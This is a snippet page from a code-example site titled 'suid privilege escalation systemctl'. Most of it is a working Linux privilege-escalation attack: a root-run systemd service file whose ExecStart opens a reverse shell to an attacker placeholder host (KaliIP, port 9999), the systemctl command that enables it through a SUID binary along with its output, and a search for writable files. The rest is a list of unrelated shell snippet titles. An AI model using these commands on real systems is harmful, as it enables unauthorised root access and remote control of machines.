Search
 
SCRIPT & CODE EXAMPLE
 

SHELL

suid privilege escalation systemctl

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target
Comment

suid privilege escalation systemctl

/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
Comment

suid privilege escalation systemctl

find -type f -maxdepth 2 -writable
Comment

PREVIOUS NEXT
Code Example
Shell :: clone from a specific branch 
Shell :: error: RPC failed; curl 56 LibreSSL SSL_read: Connection reset by peer, errno 54 
Shell :: listen all local open ports 
Shell :: ubuntu remove directory 
Shell :: mkdir: /data/db: Read-only file system 
Shell :: change wsl to version 1 
Shell :: git file history 
Shell :: how upgrade my notebook 
Shell :: install saas 
Shell :: linux capitalize string using tr 
Shell :: force delete folder 
Shell :: how to install ant in linux 
Shell :: golang protobuff installation 
Shell :: ubuntu view disk space ec2 
Shell :: paru install 
Shell :: pom extract version linux 
Shell :: install wget 
Shell :: how to exit from vi 
Shell :: Failed to fetch https://packages.sury.org/php/dists/jessie/main/binary-amd64/Packages HttpError404 
Shell :: cp folder ubuntu include git 
Shell :: android init emulator with cli 
Shell :: how to follow a file url in vim 
Shell :: ping a port linux 
Shell :: rust install 
Shell :: accessing settings through cmd 
Shell :: git stash apply specific index 
Shell :: gcsfuse allow_other 
Shell :: microstack change dashboard port 
Shell :: ubuntu watch log file command 
Shell :: pip uninstall all from env 
ADD CONTENT
Topic
Content
Source link
Name
1+3 =